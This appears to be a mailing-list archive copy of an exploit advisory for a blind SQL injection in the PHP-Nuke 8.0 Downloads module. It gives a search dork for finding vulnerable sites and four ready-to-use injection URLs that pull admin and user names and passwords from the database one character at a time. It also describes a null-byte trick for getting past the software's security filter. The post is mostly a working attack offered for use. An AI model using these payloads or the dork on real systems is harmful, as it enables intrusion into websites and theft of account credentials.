<<< Date Index >>>     <<< Thread Index >>>

PHP-Nuke 8.0 Downloads Blind Sql Injection



#####################################################################################
####               PHP-Nuke 8.0 Downloads Blind Sql Injection                   
 ####
#####################################################################################
#                                                                               
    #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                            
    #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                     
    #
#Our Site : http://ircrash.com                                                  
    #
#My Official WebSite : http://r3dw0rm.ir                                        
    #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)        
    #
#####################################################################################
#                                                                               
    #
#Download : http://phpnuke.org                                                  
    #
#                                                                               
    #
#Dork : inurl:modules.php?name=Downloads "PHP-Nuke"                             
    #
#                                                                               
    #
#####################################################################################
#                                      [Bug]                                    
    #
#                                                                               
    #
#Admin Username : 
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@xxxxxxxxx&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : 
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@xxxxxxxxx&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
                                    
#Users Username : 
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@xxxxxxxxx&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
                                   
#Users Password : 
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@xxxxxxxxx&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
                                    
#                                                                               
    #
#####################################################################################
#                                      [Note]                                   
    #
#                                                                               
    #
#1. magic_quotes_gpc = Off                                                      
    #
#2. register_globals = On                                                       
    #
#3. For using bug you must login via a simple user.                             
    #
#4. After using bug go to this url :                                            
    #
#http://[site]/[path]/modules.php?name=Downloads&d_op=Add&email=attacker@xxxxxxxxx&title=zz&url=zz&description=zz
#5. I use ascii codes and null byte in url for bypass nuke security function    
    #
#   please don't change ascii code and %00.                                     
    #
#                                                                               
    #
###################################### TNX GOD 
######################################